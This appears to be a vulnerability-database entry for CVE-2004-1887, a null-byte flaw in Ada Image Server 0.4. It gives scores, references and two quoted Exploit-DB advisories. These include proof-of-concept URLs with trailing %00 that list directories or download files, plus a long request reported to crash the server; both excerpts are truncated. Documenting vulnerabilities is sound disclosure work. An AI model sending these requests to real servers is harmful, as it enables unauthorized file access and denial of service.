CVE-2004-1887
published 2004-12-31CVE-2004-1887: Ada Image Server (ImgSvr) 0.4 allows remote attackers to view directories or download files via an HTTP request with a trailing %00 (null).
PriorityP423medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.82%
88.7th percentile
Ada Image Server (ImgSvr) 0.4 allows remote attackers to view directories or download files via an HTTP request with a trailing %00 (null).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ada | imgsvr | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ADA IMGSVR 0.4 - Remote Directory Listing
exploitdb·2004-04-01
CVE-2004-1887 ADA IMGSVR 0.4 - Remote Directory Listing
ADA IMGSVR 0.4 - Remote Directory Listing
---
source: https://www.securityfocus.com/bid/10026/info
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the disclose root directory listings. This issue has also been reported to allow for listing of directories that reside outside the server root as well.
An attacker may leverage this issue to gain access to sensitive information by disclosing directory listings; information disclosed in this way could lead to further attacks against the target system.
For listing directories inside the server root (provided by Donato Ferrante):
http://www.example.org:1234/%00/
http://www.example.org:1234/someDirectory%00/
http://www.example.org:1234/someDirectory/%00/
For listing directories outside of the se
Exploit-DB
ADA IMGSVR 0.4 - Arbitrary File Download
exploitdb·2004-04-01
CVE-2004-1887 ADA IMGSVR 0.4 - Arbitrary File Download
ADA IMGSVR 0.4 - Arbitrary File Download
---
source: https://www.securityfocus.com/bid/10027/info
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.
An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory.
http://www.example.org:1234/someDirectory/fileName%00
The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgs
http://marc.info/?l=bugtraq&m=108083813528255&w=2http://secunia.com/advisories/11277http://sourceforge.net/project/shownotes.php?release_id=230023http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txthttp://www.securityfocus.com/bid/10026http://www.securityfocus.com/bid/10027https://exchange.xforce.ibmcloud.com/vulnerabilities/15706http://marc.info/?l=bugtraq&m=108083813528255&w=2http://secunia.com/advisories/11277http://sourceforge.net/project/shownotes.php?release_id=230023http://www.autistici.org/fdonato/advisory/imgSvr0.4-adv.txthttp://www.securityfocus.com/bid/10026http://www.securityfocus.com/bid/10027https://exchange.xforce.ibmcloud.com/vulnerabilities/15706
2004-12-31
Published